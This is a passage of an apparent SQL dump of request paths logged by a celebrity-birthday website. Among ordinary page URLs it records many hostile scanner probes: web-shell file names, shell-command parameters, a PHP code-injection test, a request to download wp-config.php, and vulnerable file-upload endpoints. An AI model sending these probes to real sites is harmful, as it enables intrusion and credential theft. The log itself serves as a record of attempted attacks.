theron/#respond'),(1,'/charlize-theron/feed/'),(1,'/cher'),(1,'/cher/'),(1,'/cher/feed/'),(1,'/cig0119/up.php'),(1,'/cinfo.php?password=532523&re_password=&login=var_dump'),(1,'/ckeditor/ckfinder/ckfinder.html'),(1,'/ckeditor/popup-pomo.php'),(1,'/ckfinder/ckfinder.html'),(1,'/cmd.php'),(1,'/cms/'),(1,'/cmseasy/'),(1,'/code.php'),(1,'/code.php?nd6e706'),(1,'/code.php?qd6e706'),(1,'/comments-popup_backup.php?ver_full&token=1257'),(1,'/comments/feed/'),(1,'/components/com_mailto/views/sent/metadata.xml'),(1,'/components/com_media/?nila2114&dini'),(1,'/components/com_media/index.php?nila2114&dini'),(1,'/config'),(1,'/config.'),(1,'/config.bak'),(1,'/config.old'),(1,'/config.php'),(1,'/config.php~'),(1,'/config.php~~'),(1,'/configbak.php'),(1,'/configuration.php'),(1,'/configuration.php?cmd=free'),(1,'/configurationbak.php'),(1,'/conns.php'),(1,'/console/auth/reg_newuser.jsp'),(1,'/console/include/not_login.htm'),(1,'/contact-us'),(1,'/contact-us-2'),(1,'/contact-us-2/'),(1,'/contact-us-2/1/'),(1,'/contact-us-2/href'),(1,'/contact-us/'),(1,'/contact/popup-pomo.php'),(1,'/contaeect/'),(1,'/conyes.php'),(1,'/coremail/'),(1,'/country-legend-tim-mcgraw'),(1,'/country-legend-tim-mcgraw/'),(1,'/country-legend-tim-mcgraw/feed/'),(1,'/country-singer-randy-travist'),(1,'/country-singer-randy-travist/'),(1,'/country-singer-randy-travist/feed/'),(1,'/courteney-cox'),(1,'/courteney-cox/'),(1,'/courteney-cox/feed/'),(1,'/cron.php'),(1,'/cron.php?password=532523&re_password=&login=var_dump'),(1,'/css.php'),(1,'/css.php?nd335c3'),(1,'/css.php?qd335c3'),(1,'/custom_rapista/upload.php'),(1,'/CuteSoft_Client/CuteEditor/Help/default.htm'),(1,'/cybjindex.action'),(1,'/d2218191-7b54-4cf3-8963-6572c2d4ddd5'),(1,'/daniel-radcliffe'),(1,'/daniel-radcliffe/'),(1,'/daniel-radcliffe/?(h/=Z%28t%2Ca%2C100%2C'),(1,'/daniel-radcliffe/?(h/=Z(t,a,100,'),(1,'/daniel-radcliffe/?h/=Z%28t%2Ca%2C1%2C'),(1,'/daniel-radcliffe/?h/=Z(t,a,1,'),(1,'/daniel-radcliffe/feed/'),(1,'/database.php'),(1,'/david-hasselhoff'),(1,'/david-hasselhoff/'),(1,'/david-hasselhoff/feed/'),(1,'/db.php'),(1,'/db.php?n95e668'),(1,'/db.php?q95e668'),(1,'/debbie-gibson'),(1,'/debbie-gibson/'),(1,'/debbie-gibson/#respond'),(1,'/debbie-gibson/feed/'),(1,'/dede/'),(1,'/dedecms/'),(1,'/default.php'),(1,'/defines.php'),(1,'/defines.php?na04af1'),(1,'/defines.php?qa04af1'),(1,'/deptWebsiteAction.do'),(1,'/dhwbplus/flink.php'),(1,'/dianna-argon-actress'),(1,'/dianna-argon-actress/'),(1,'/dianna-argon-actress/feed/'),(1,'/diff.php'),(1,'/diff.php?nf76775'),(1,'/diff.php?qf76775'),(1,'/digg.php'),(1,'/dir.php'),(1,'/dirs.php'),(1,'/dirs.php?n071238'),(1,'/dirs.php?q071238'),(1,'/discuz/'),(1,'/docs/'),(1,'/doku.php'),(1,'/dolph-ziggler'),(1,'/dolph-ziggler/'),(1,'/dolph-ziggler/#respond'),(1,'/dolph-ziggler/feed/'),(1,'/downloader'),(1,'/downloader/'),(1,'/dpllnzesgr4lops.php'),(1,'/drake-birthday'),(1,'/drake-birthday/'),(1,'/drake-birthday/#respond'),(1,'/drake-birthday/&layout=button_count&show_faces=false&width=105&action=like&colorscheme=light&height=21\\\"'),(1,'/drake-birthday/feed/'),(1,'/drupal/'),(1,'/dump.php'),(1,'/dump.php?n59a097'),(1,'/dump.php?q59a097'),(1,'/dvbbs/'),(1,'/dwayne-the-rock-johnson'),(1,'/dwayne-the-rock-johnson/'),(1,'/dwayne-the-rock-johnson/#respond'),(1,'/dwayne-the-rock-johnson/feed/'),(1,'/dwight-eisenhower-birthday'),(1,'/dwight-eisenhower-birthday/'),(1,'/dwight-eisenhower-birthday/feed/'),(1,'/ec52522e-5f0e-4e90-818c-c015d844dd96'),(1,'/ecshop/'),(1,'/editor/'),(1,'/editor/dtd/'),(1,'/editor/editor/'),(1,'/editor/editor/filemanager/browser/default/connectors/asp/connector.asp'),(1,'/editor/editor/filemanager/browser/default/connectors/php/connector.php'),(1,'/editor/editor/filemanager/connectors/asp/connector.asp'),(1,'/editor/editor/filemanager/connectors/php/connector.php'),(1,'/editor/fckeditor/editor/'),(1,'/editors/fckeditor/editor'),(1,'/edward-norton'),(1,'/edward-norton/'),(1,'/edward-norton/feed/'),(1,'/ef0f0877-122a-4471-88c7-813b77da5c01'),(1,'/efawinstall/index.php.bak'),(1,'/elements.php'),(1,'/eminem-birthday'),(1,'/eminem-birthday/'),(1,'/eminem-birthday/#respond'),(1,'/eminem-birthday/feed/'),(1,'/empirecms/'),(1,'/en/wp-login.php'),(1,'/enrique-iglesias'),(1,'/enrique-iglesias/'),(1,'/enrique-iglesias/feed/'),(1,'/error-log.php'),(1,'/error.php'),(1,'/error.php?n503876'),(1,'/error.php?q503876'),(1,'/error_log.php'),(1,'/eshop/'),(1,'/evander-holyfield-birthday'),(1,'/evander-holyfield-birthday/'),(1,'/evander-holyfield-birthday/#respond'),(1,'/evander-holyfield-birthday/%5D'),(1,'/evander-holyfield-birthday/feed/'),(1,'/evander-holyfield-birthday/]'),(1,'/evangeline-lilly'),(1,'/evangeline-lilly/'),(1,'/evangeline-lilly/feed/'),(1,'/eweb/'),(1,'/ewebeditor/'),(1,'/examples/file-manager.html'),(1,'/examples/index.html'),(1,'/examples/readonly.html'),(1,'/exit-point.php'),(1,'/extern.php?action=feed&type=atom'),(1,'/extmail/'),(1,'/extract.php'),(1,'/extracts.php'),(1,'/f7684c89-2c9c-479d-8894-132b4b645dbf'),(1,'/face.php'),(1,'/fangmail/'),(1,'/faqs-new/wp-login.php'),(1,'/Fbrrchive.php'),(1,'/fck/editor/'),(1,'/fckeditor/editor/'),(1,'/fckeditor/editor/dtd/fck_dtd_test.html'),(1,'/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp'),(1,'/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php'),(1,'/FCKeditor/editor/filemanager/connectors/asp/connector.asp'),(1,'/FCKeditor/editor/filemanager/connectors/php/connector.php'),(1,'/feed'),(1,'/feed.asp'),(1,'/feed/'),(1,'/file.php'),(1,'/files.php'),(1,'/files.php?n23f412'),(1,'/files.php?q23f412'),(1,'/filess.php'),(1,'/finder/popup-pomo.php'),(1,'/fluxbb/'),(1,'/fonts.googleapis.com'),(1,'/fonts.googleapis.com/css?family=Open%20Sans:300italic,400italic,600italic,400,600,700'),(1,'/fonts.googleapis.com/css?family=Open%20Sans:300italic,400italic,600italic,400,600,700&'),(1,'/fonts.googleapis.com/css?family=Quattrocento%20Sans:400,700'),(1,'/fonts.googleapis.com/css?family=Quattrocento%20Sans:400,700&'),(1,'/fonts.googleapis.com/css?family=Roboto:500,400italic,700,500italic,400,300'),(1,'/fonts.googleapis.com/css?family=Roboto:500,400italic,700,500italic,400,300&'),(1,'/foosun/'),(1,'/footer.php'),(1,'/footer.php?n44390c'),(1,'/footer.php?q44390c'),(1,'/footer_front.php'),(1,'/force-download.php?file=wp-config.php'),(1,'/forest-whitaker'),(1,'/forest-whitaker/'),(1,'/forest-whitaker/feed/'),(1,'/forum/'),(1,'/forum/admincp/'),(1,'/freida-pinto-birthday'),(1,'/freida-pinto-birthday/'),(1,'/freida-pinto-birthday/#respond'),(1,'/freida-pinto-birthday/feed/'),(1,'/ftp/up.php?up=hous'),(1,'/functions.php'),(1,'/functions.php?n78cd5a'),(1,'/functions.php?q78cd5a'),(1,'/functions.php?ver_full&token=1257'),(1,'/fwalplus/flink.php'),(1,'/fysel.php'),(1,'/gallery.php'),(1,'/gary-busey-actor'),(1,'/gary-busey-actor/'),(1,'/gary-busey-actor/?(f=100%2A%28x%2Fd%29%20'),(1,'/gary-busey-actor/?(f=100*(x/d)+'),(1,'/gary-busey-actor/feed/'),(1,'/Gass.php?cmd=free'),(1,'/Gass.php?cmd=help'),(1,'/gbpicsejs.html'),(1,'/gconf.php?password=532523&re_password=&login=var_dump'),(1,'/gemb.php'),(1,'/general.php'),(1,'/george-clooney'),(1,'/george-clooney/'),(1,'/george-clooney/feed/'),(1,'/george-strait'),(1,'/george-strait/'),(1,'/george-strait/feed/'),(1,'/gerald-mcraney'),(1,'/gerald-mcraney/'),(1,'/gerald-mcraney/feed/'),(1,'/get.php'),(1,'/get.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),(1,'/ghandi-1869-1948'),(1,'/ghandi-1869-1948/'),(1,'/ghandi-1869-1948/?replytocom=11'),(1,'/ghandi-1869-1948/feed/'),(1,'/giorgio-armani'),(1,'/giorgio-armani/'),(1,'/giorgio-armani/feed/'),(1,'/global.php'),(1,'/global.php?n89024b'),(1,'/global.php?q89024b'),(1,'/Good-404-Sorry.php'),(1,'/google.com/reader/view'),(1,'/google01f2034122c0cde8.html'),(1,'/googlefce1b3fa586ab3d3.html'),(1,'/green.php'),(1,'/gwen-stefani-birthday'),(1,'/gwen-stefani-birthday/'),(1,'/gwen-stefani-birthday/#respond'),(1,'/gwen-stefani-birthday/feed/'),(1,'/gwxvhome.actiom'),(1,'/hayden-panettiere'),(1,'/hayden-panettiere/'),(1,'/hayden-panettiere/feed/'),(1,'/head.php'),(1,'/header.php'),(1,'/header.php?n1c1ae6'),(1,'/header.php?q1c1ae6'),(1,'/Help'),(1,'/help.php'),(1,'/helpnew/faq/faq_simple_zh_CN.jsp'),(1,'/hilary-duff'),(1,'/hilary-duff/'),(1,'/hilary-duff/#respond'),(1,'/hilary-duff/feed/'),(1,'/hillary-clinton-birthday'),(1,'/hillary-clinton-birthday/'),(1,'/hillary-clinton-birthday/#respond'),(1,'/hillary-clinton-birthday/&layout=button_count&show_faces=false&width=105&action=like&colorscheme=light&height=21\\\"'),(1,'/hillary-clinton-birthday/feed/'),(1,'/hillary-clinton-birthday/href'),(1,'/Hodienne.php'),(1,'/home.actiom'),(1,'/home.bak.php'),(1,'/home/wp-login.php'),(1,'/html5uploader/upload.php'),(1,'/hugh-jackman-birthday'),(1,'/hugh-jackman-birthday/'),(1,'/hugh-jackman-birthday/feed/'),(1,'/hugh-laurie'),(1,'/hugh-laurie/'),(1,'/hugh-laurie/feed/'),(1,'/ian-mckellen'),(1,'/ian-mckellen/'),(1,'/ian-mckellen/feed/'),(1,'/ids/admin/login.jsp'),(1,'/ids/admin/userhome/forgetPwd.jsp'),(1,'/images/.jindex.php'),(1,'/images/404.php'),(1,'/images/adodb.class.php'),(1,'/images/b374k-2.8.php'),(1,'/images/error-log.php'),(1,'/images/login.php?login=cmd'),(1,'/images/stories/0day.php'),(1,'/images/stories/3xp.php'),(1,'/images/stories/food.php'),(1,'/images/stories/Palestine.php'),(1,'/images/stories/vito.php'),(1,'/images/systemcache.php'),(1,'/images/xxu.php'),(1,'/imgs/error-log.php'),(1,'/implenentation'),(1,'/inc.php'),(1,'/inc.php?n318a65'),(1,'/inc.php?password=532523&re_password=&login=var_dump'),(1,'/inc.php?q318a65'),(1,'/inc/playerKinds.xml'),(1,'/inc/rsd.php'),(1,'/inc/Templates/rss.xslt'),(1,'/include.php'),(1,'/include.php?n872b97'),(1,'/include.php?q872b97'),(1,'/includes/'),(1,'/includes/error-log.php'),(1,'/includes/fckeditor/editor/'),(1,'/includes/systemcache.php'),(1,'/indeqweqwex.php'),(1,'/indes.php'),(1,'/index-2.php?rindex=1'),(1,'/index.action'),(1,'/index.cgi'),(1,'/index.jsp'),(1,'/index.jsp/'),(1,'/index.php'),(1,'/index.php/admin/'),(1,'/index.php/admin123/'),(1,'/index.php/adminadmin/'),(1,'/index.php/myadmin/'),(1,'/index.php/shop/'),(1,'/index.php/superadmin/'),(1,'/index.php?c=print(md5(sund0wn));'),(1,'/index.php?cperpage=1'),(1,'/index.php?cperpage=1&spiderZz=Zz%3A0.6.1'),(1,'/index.php?liu=qt&fukq=t&RNv=f'),(1,'/index.php?m=admin'),(1,'/index.php?m=admin&c=index&a=login&pc_hash='),(1,'/index.php?m=search'),(1,'/index.php?m=wap'),(1,'/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2'),(1,'/index.php?option=com_jdownloads&Itemid=0&view=upload'),(1,'/index.php?option=com_user&task=register'),(1,'/index.php?option=com_users&view=registration'),(1,'/index1.php?rindex=1'),(1,'/index2.php'),(1,'/index2.php?rindex=1'),(1,'/indexs.php'),(1,'/indexs.php?rindex=1'),(1,'/info.php'),(1,'/info.php?password=532523&re_password=&login=var_dump'),(1,'/informacion/popup-pomo.php'),(1,'/infos.php'),(1,'/ini.php'),(1,'/ini.php?n760097'),(1,'/ini.php?q760097'),(1,'/init_includes.php'),(1,'/install'),(1,'/install/index.php.bak'),(1,'/install/setup.php'),(1,'/interface.php?action=publish'),(1,'/issmall'),(1,'/ixghavpvw.html'),(1,'/jack-black'),(1,'/jack-black/'),(1,'/jack-black/feed/'),(1,'/jack-nicholson'),(1,'/jack-nicholson/'),(1,'/jack-nicholson/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwi0uO2EqZLLAhXlN6YKHSrZAXo48AEQwW4IKTAJ&usg=AFQjCNH6degBK3hRMJNt2XWChbwqEmYlpA'),(1,'/jack-nicholson/feed/'),(1,'/james-gandolfini'),(1,'/james-gandolfini/'),(1,'/james-gandolfini/#respond'),(1,'/james-gandolfini/feed/'),(1,'/jamie-oliver'),(1,'/jamie-oliver/'),(1,'/jamie-oliver/feed/'),(1,'/JasperFitch.php?login=cmd'),(1,'/javascript.php'),(1,'/javascript.php?n642afe'),(1,'/javascript.php?q642afe'),(1,'/jay-leno-acclaimed-tv-host'),(1,'/jay-leno-acclaimed-tv-host/'),(1,'/jay-leno-acclaimed-tv-host/feed/'),(1,'/jcc-sympa.com/wp-includes/Text/Diff/Engine/cache.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/jcms/index.jsp'),(1,'/jcms/index_jcms.jsp'),(1,'/jeff-goldblum-birthday'),(1,'/jeff-goldblum-birthday/'),(1,'/jeff-goldblum-birthday/#respond'),(1,'/jeff-goldblum-birthday/&layout=button_count&show_faces=false&width=105&action=like&colorscheme=light&height=21\\\"'),(1,'/jeff-goldblum-birthday/feed/'),(1,'/jegraisos.php'),(1,'/jennifer-lopez'),(1,'/jennifer-lopez/'),(1,'/jennifer-lopez/#respond'),(1,'/jennifer-lopez/feed/'),(1,'/jep-robertson'),(1,'/jep-robertson/'),(1,'/jep-robertson/#respond'),(1,'/jep-robertson/&h=579&w=800&tbnid=r9eOqwljeltTRM:&docid=qMzTqY2scqSFbM&hl=en-us&ei=ElS-VpP3J4PSjAPHroyYDQ&tbm=isch&client=safari&ved=0ahUKEwiTyObymvPKAhUDKWMKHUcXA9M4ZBAzCD4oOzA7'),(1,'/jep-robertson/feed/'),(1,'/jerry-seinfeld-greatest-stand-up-comedian'),(1,'/jerry-seinfeld-greatest-stand-up-comedian/'),(1,'/jerry-seinfeld-greatest-stand-up-comedian/feed/'),(1,'/jerry-seinfeld-greatest-stand-up-comedian/href'),(1,'/jessica-nigri'),(1,'/jessica-nigri/'),(1,'/jessica-nigri/feed/'),(1,'/jim-nabors'),(1,'/jim-nabors/'),(1,'/jim-nabors/feed/'),(1,'/jimmy-fallon'),(1,'/jimmy-fallon/'),(1,'/jimmy-fallon/#respond'),(1,'/jimmy-fallon/feed/'),(1,'/john-cena'),(1,'/john-cena/'),(1,'/john-cena/#respond'),(1,'/john-cena/feed/'),(1,'/john-constantine-unitas'),(1,'/john-constantine-unitas/'),(1,'/john-constantine-unitas/#respond'),(1,'/john-constantine-unitas/feed/'),(1,'/john-lennon-birthday'),(1,'/john-lennon-birthday/'),(1,'/john-lennon-birthday/#respond'),(1,'/john-lennon-birthday/feed/'),(1,'/johnny-carson-birthday'),(1,'/johnny-carson-birthday/'),(1,'/johnny-carson-birthday/#respond'),(1,'/johnny-carson-birthday/&layout=button_count&show_faces=false&width=105&action=like&colorscheme=light&height=21\\\"'),(1,'/johnny-carson-birthday/feed/'),(1,'/johnny-depp'),(1,'/johnny-depp/'),(1,'/johnny-depp/feed/'),(1,'/jon-stewart/'),(1,'/joomla/'),(1,'/joomla_hashes.php'),(1,'/js.php'),(1,'/js/login.php?login=cmd'),(1,'/js/tiny_mce/plugins/ajaxfilemanager/inc/interface.php'),(1,'/js/webforms/upload/'),(1,'/js/webforms/upload/index.php'),(1,'/jxcms/'),(1,'/jxelplus/bookfeedback.php'),(1,'/kanye-west'),(1,'/kanye-west/'),(1,'/kanye-west/feed/'),(1,'/kate-upton'),(1,'/kate-upton/'),(1,'/kate-upton/#respond'),(1,'/kate-upton/feed/'),(1,'/keanu-reeves'),(1,'/keanu-reeves/'),(1,'/keanu-reeves/#respond'),(1,'/keanu-reeves/feed/'),(1,'/KEdit/'),(1,'/kelly-clarkson'),(1,'/kelly-clarkson/'),(1,'/kelly-clarkson/feed/'),(1,'/kesion/'),(1,'/kim-kardashian-birthday'),(1,'/kim-kardashian-birthday/'),(1,'/kim-kardashian-birthday/#respond'),(1,'/kim-kardashian-birthday/feed/'),(1,'/kindeditor/'),(1,'/kingcms/'),(1,'/kui.php'),(1,'/kyle-chandler'),(1,'/kyle-chandler/'),(1,'/kyle-chandler/#respond'),(1,'/kyle-chandler/feed/'),(1,'/l.php'),(1,'/la-toya-jackson'),(1,'/la-toya-jackson/'),(1,'/la-toya-jackson/feed/'),(1,'/language/adodb.class.php'),(1,'/language/en-GB/en-GB.xml'),(1,'/latest-wp/wp-includes/Text/Diff/Engine/cache.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/layouts.php'),(1,'/lazycms/'),(1,'/leadbbs/'),(1,'/lenny-kravitz'),(1,'/lenny-kravitz/'),(1,'/lenny-kravitz/feed/'),(1,'/lib.php'),(1,'/lib.php?n828043'),(1,'/lib.php?q828043'),(1,'/lib.php?ver_full&token=1257'),(1,'/libraries/up.php?ajab'),(1,'/libs/'),(1,'/lic.php'),(1,'/license.php'),(1,'/license2016.php'),(1,'/LICENSES.php'),(1,'/lindsay-lohan'),(1,'/lindsay-lohan/'),(1,'/lindsay-lohan/#respond'),(1,'/lindsay-lohan/feed/'),(1,'/lionel-messi'),(1,'/lionel-messi/'),(1,'/lionel-messi/#respond'),(1,'/lionel-messi/feed/'),(1,'/list.php'),(1,'/lnc.php?password=532523&re_password=&login=var_dump'),(1,'/lndex.php'),(1,'/load-config.php'),(1,'/load.php'),(1,'/locoy.php'),(1,'/log.php?login=cmd'),(1,'/login.action'),(1,'/login.php'),(1,'/login.php?login=cmd'),(1,'/login/Jeecms.do'),(1,'/login_wall.php?login=cmd'),(1,'/logs/up.php?up=hous'),(1,'/logsys.php'),(1,'/logsys.php?password=532523&re_password=&login=var_dump'),(1,'/lookforbadguys.php?cmd=free'),(1,'/ludacris'),(1,'/ludacris/'),(1,'/ludacris/#respond'),(1,'/ludacris/feed/'),(1,'/lyt/archive.php'),(1,'/lyt/wp-plugin.php'),(1,'/m'),(1,'/m.php?cmd=free'),(1,'/m/'),(1,'/magento_version'),(1,'/magmi/web/plugin_upload.php'),(1,'/mail/'),(1,'/maintlogin.jsp'),(1,'/mall/'),(1,'/manage/'),(1,'/manager/'),(1,'/manager/html'),(1,'/manager/media'),(1,'/manager/status'),(1,'/manu-ginobili'),(1,'/manu-ginobili/'),(1,'/manu-ginobili/feed/'),(1,'/marc-anthony'),(1,'/marc-anthony/'),(1,'/marc-anthony/#respond'),(1,'/marc-anthony/feed/'),(1,'/mario-lopez-birthday'),(1,'/mario-lopez-birthday/'),(1,'/mario-lopez-birthday/feed/'),(1,'/marion-cotillard'),(1,'/marion-cotillard/'),(1,'/marion-cotillard/feed/'),(1,'/marisa-miller'),(1,'/marisa-miller/'),(1,'/marisa-miller/feed/'),(1,'/mark-cuban'),(1,'/mark-cuban/'),(1,'/mark-cuban/feed/'),(1,'/martina-mcbride'),(1,'/martina-mcbride/'),(1,'/martina-mcbride/feed/'),(1,'/Materialnlns.php'),(1,'/matt-damon-birthday'),(1,'/matt-damon-birthday/'),(1,'/matt-damon-birthday/feed/'),(1,'/matthew-fox'),(1,'/matthew-fox/'),(1,'/matthew-fox/feed/'),(1,'/maxcms/'),(1,'/media-parse-new.php'),(1,'/media/b374k-2.8.php'),(1,'/media/error-log.php'),(1,'/media/login.php?login=cmd'),(1,'/media/popup-pomo.php'),(1,'/media/systemcache.php'),(1,'/media/up.php?Submit'),(1,'/melissa-mccarthy'),(1,'/melissa-mccarthy/'),(1,'/melissa-mccarthy/#respond'),(1,'/melissa-mccarthy/feed/'),(1,'/menu.php'),(1,'/menu.php?action=publish'),(1,'/menu.php?ndfbe75'),(1,'/menu.php?qdfbe75'),(1,'/meryl-streep'),(1,'/meryl-streep/'),(1,'/meryl-streep/#respond'),(1,'/meryl-streep/feed/'),(1,'/metinfo/'),(1,'/mgaflogin.action'),(1,'/michael-emerson'),(1,'/michael-emerson/'),(1,'/michael-emerson/#respond'),(1,'/michael-emerson/feed/'),(1,'/mide.php'),(1,'/mike-tyson-boxer'),(1,'/mike-tyson-boxer/'),(1,'/mike-tyson-boxer/#respond'),(1,'/mike-tyson-boxer/feed/'),(1,'/mila-kunis'),(1,'/mila-kunis/'),(1,'/mila-kunis/#respond'),(1,'/mila-kunis/feed/'),(1,'/miranda-cosgrove'),(1,'/miranda-cosgrove/'),(1,'/miranda-cosgrove/feed/'),(1,'/mko.php'),(1,'/mobile/'),(1,'/model.php'),(1,'/model.php?n726b60'),(1,'/model.php?q726b60'),(1,'/modules/columnadverts/uploadimage.php'),(1,'/modules/error-log.php'),(1,'/modules/homepageadvertise/uploadimage.php'),(1,'/modules/modules/login_wall.php?login=cmd'),(1,'/modules/modules/modules.php'),(1,'/modules/mod_feed/tmpl/layouts.php'),(1,'/modules/mod_simplefileuploadv1.3/elements/03432699.php'),(1,'/modules/mod_simplefileuploadv1.3/elements/26512964.php'),(1,'/modules/mod_simplefileuploadv1.3/elements/4458374.php'),(1,'/modules/mod_simplefileuploadv1.3/elements/udd.php'),(1,'/modules/productpageadverts/uploadimage.php'),(1,'/modules/simpleslideshow/uploadimage.php'),(1,'/modules/systemcache.php'),(1,'/modules/up.php?up=hous'),(1,'/modx.php'),(1,'/morgan-freeman'),(1,'/morgan-freeman/'),(1,'/morgan-freeman/feed/'),(1,'/mr-t'),(1,'/mr-t/'),(1,'/mr-t/feed/'),(1,'/ms-media.php'),(1,'/muieblackcat'),(1,'/myadmin/'),(1,'/myadmin/index.php'),(1,'/mysql.php'),(1,'/N0WaY/N0WaY1bb2/N0WaY123.php'),(1,'/N0Wccvvd333.php'),(1,'/new/wp-login.php'),(1,'/news.php'),(1,'/news//wp-admin/setup-config.php'),(1,'/news/html'),(1,'/news/wp-admin/setup-config.php'),(1,'/news/wp-login.php'),(1,'/news_parser.class.php'),(1,'/nicesite.php'),(1,'/object.php'),(1,'/ods.php'),(1,'/oecms/'),(1,'/old/wp-admin/'),(1,'/online/'),(1,'/online/index.php'),(1,'/ooimg.php'),(1,'/option.php'),(1,'/option.php?ncdd94a'),(1,'/option.php?qcdd94a'),(1,'/options-page.php'),(1,'/options.php'),(1,'/opts.php'),(1,'/pablo-picasso-birthday'),(1,'/pablo-picasso-birthday/'),(1,'/pablo-picasso-birthday/#respond'),(1,'/pablo-picasso-birthday/&layout=button_count&show_faces=false&width=105&action=like&colorscheme=light&height=21\\\"'),(1,'/pablo-picasso-birthday/feed/'),(1,'/page.php'),(1,'/page.php?nf0b08a'),(1,'/page.php?qf0b08a'),(1,'/pamela-anderson'),(1,'/pamela-anderson/'),(1,'/pamela-anderson/#respond'),(1,'/pamela-anderson/feed/'),(1,'/paul-mccartney'),(1,'/paul-mccartney/'),(1,'/paul-mccartney/?replytocom=6'),(1,'/paul-mccartney/feed/'),(1,'/paul-simon-birthday'),(1,'/paul-simon-birthday/'),(1,'/paul-simon-birthday/feed/'),(1,'/paula-abdul'),(1,'/paula-abdul/'),(1,'/paula-abdul/#respond'),(1,'/paula-abdul/feed/'),(1,'/phpbb/'),(1,'/phpcms/'),(1,'/phpinfo.php'),(1,'/phpMyAdmin/index.php'),(1,'/phpwind/'),(1,'/php_mediagallery/admin/upload.php'),(1,'/php_ygallery/admin/upload.php'),(1,'/php_ygallery/source/admin/upload.php'),(1,'/pinfo.php'),(1,'/pink'),(1,'/pink/'),(1,'/pink/#respond'),(1,'/pink/++GET+http://birthdaypedia.com/pink/+[0,61642,76931]+-%3E'),(1,'/pink/++GET+http:/birthdaypedia.com/pink/+[0,61642,76931]+-%3E'),(1,'/pink/++GET+http:/birthdaypedia.com/pink/+[0,61642,76931]+-%3E/pink/++GET+http://birthdaypedia.com/pink/+[0,61642,76931]+-%3E'),(1,'/pink/++GET+http:/birthdaypedia.com/pink/+[0,61642,76931]+-%3E/pink/++GET+http:/birthdaypedia.com/pink/+[0,61642,76931]+-%3E'),(1,'/pink/feed/'),(1,'/pink/recaptcha/api/challenge?k=6LfOYgoTAAAAAInWDVTLSc8Yibqp-c9DaLimzNGM'),(1,'/plug//'),(1,'/plug/publish'),(1,'/plugin-change.php'),(1,'/plugin.php'),(1,'/plugin.php?n55d3bf'),(1,'/plugin.php?q55d3bf'),(1,'/plugins/authentication/joomla/joomla.xml'),(1,'/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='),(1,'/plugins/filemanager/filemanager/js'),(1,'/plugins/plugins.php'),(1,'/plus/bookfeedback.php'),(1,'/plus/flink.php'),(1,'/plus/heightsearch.php'),(1,'/plus/rssmap.html'),(1,'/plus/sitemap.html'),(1,'/pma/index.php'),(1,'/pop-singer-chris-brown'),(1,'/pop-singer-chris-brown/'),(1,'/pop-singer-chris-brown/feed/'),(1,'/popup-pomo.php'),(1,'/post.php'),(1,'/prelog.php'),(1,'/press.php'),(1,'/press.php?n33beb2'),(1,'/press.php?q33beb2'),(1,'/privacy-policy'),(1,'/privacy-policy/'),(1,'/privacy-policy/feed/'),(1,'/privacy.php?youfindit'),(1,'/privacy.php?youfindit=1'),(1,'/proxy.php'),(1,'/qwpgplus/flink.php'),(1,'/randy-jackson'),(1,'/randy-jackson/'),(1,'/randy-jackson/feed/'),(1,'/ratory.php'),(1,'/ray-lewis'),(1,'/ray-lewis/'),(1,'/ray-lewis/#respond'),(1,'/ray-lewis/feed/'),(1,'/read.php?e=system&x=free¶m1=system¶m2=free'),(1,'/registros/popup-pomo.php'),(1,'/rest/'),(1,'/revslider.php'),(1,'/ricky-gervais-tv-actor'),(1,'/ricky-gervais-tv-actor/'),(1,'/ricky-gervais-tv-actor/#respond'),(1,'/ricky-gervais-tv-actor/feed/'),(1,'/ringo-starr'),(1,'/ringo-starr/'),(1,'/ringo-starr/feed/'),(1,'/robert-englund'),(1,'/robert-englund/'),(1,'/robert-englund/#respond'),(1,'/robert-englund/feed/'),(1,'/robert-pattinson'),(1,'/robert-pattinson/'),(1,'/robert-pattinson/feed/'),(1,'/robin-williams'),(1,'/robin-williams/'),(1,'/robin-williams/#respond'),(1,'/robin-williams/feed/'),(1,'/robots.php'),(1,'/robots.txt'),(1,'/robots.txt.php'),(1,'/root2.php'),(1,'/rss.class.php'),(1,'/rss.php'),(1,'/rss/'),(1,'/rss/catalog/notifystock/'),(1,'/rss/catalog/review/'),(1,'/rssd.php'),(1,'/rupert-grint'),(1,'/rupert-grint/'),(1,'/rupert-grint/?replytocom=10'),(1,'/rupert-grint/feed/'),(1,'/russell-simmons'),(1,'/russell-simmons/'),(1,'/russell-simmons/feed/'),(1,'/ryan-phillippe'),(1,'/ryan-phillippe/'),(1,'/ryan-phillippe/#respond'),(1,'/ryan-phillippe/feed/'),(1,'/s.w.org'),(1,'/sabrina-carpenter'),(1,'/sabrina-carpenter/'),(1,'/sabrina-carpenter/feed/'),(1,'/sample-page/'),(1,'/sample-page/feed/'),(1,'/sample.php'),(1,'/santana-garrett'),(1,'/santana-garrett/'),(1,'/santana-garrett/#respond'),(1,'/santana-garrett/feed/'),(1,'/sarah-ferguson-birthday'),(1,'/sarah-ferguson-birthday/'),(1,'/sarah-ferguson-birthday/feed/'),(1,'/scripts/fckeditor/editor/'),(1,'/sean-penn'),(1,'/sean-penn/'),(1,'/sean-penn/feed/'),(1,'/Search.html'),(1,'/search.php'),(1,'/security.php'),(1,'/selena-gomez'),(1,'/selena-gomez/'),(1,'/selena-gomez/feed/'),(1,'/selena-gomez/recaptcha/api/challenge?k=6LfOYgoTAAAAAInWDVTLSc8Yibqp-c9DaLimzNGM'),(1,'/septi.php'),(1,'/septii.php'),(1,'/session.php'),(1,'/session.php?n79c1ec'),(1,'/session.php?q79c1ec'),(1,'/session.php?ver_full&token=1257'),(1,'/setup.php'),(1,'/setup/'),(1,'/sfn.php'),(1,'/shell.php'),(1,'/shell1.php'),(1,'/shop/'),(1,'/shop/admin'),(1,'/shop/admin/login.php'),(1,'/shop/administrator'),(1,'/shop/index.php'),(1,'/shops/'),(1,'/showthread.php'),(1,'/sic-wp-content/themes/saengerjugend/footer.php'),(1,'/sites/all/libraries/elfinder/connectors/php/connector.php'),(1,'/sites/all/libraries/elfinder/files/32432295.php'),(1,'/sites/all/libraries/elfinder/files/7131408.php'),(1,'/sites/all/libraries/elfinder/files/wp-cache.php'),(1,'/sites/all/libraries/elfinder/files/wpfoot2.php'),(1,'/sites/a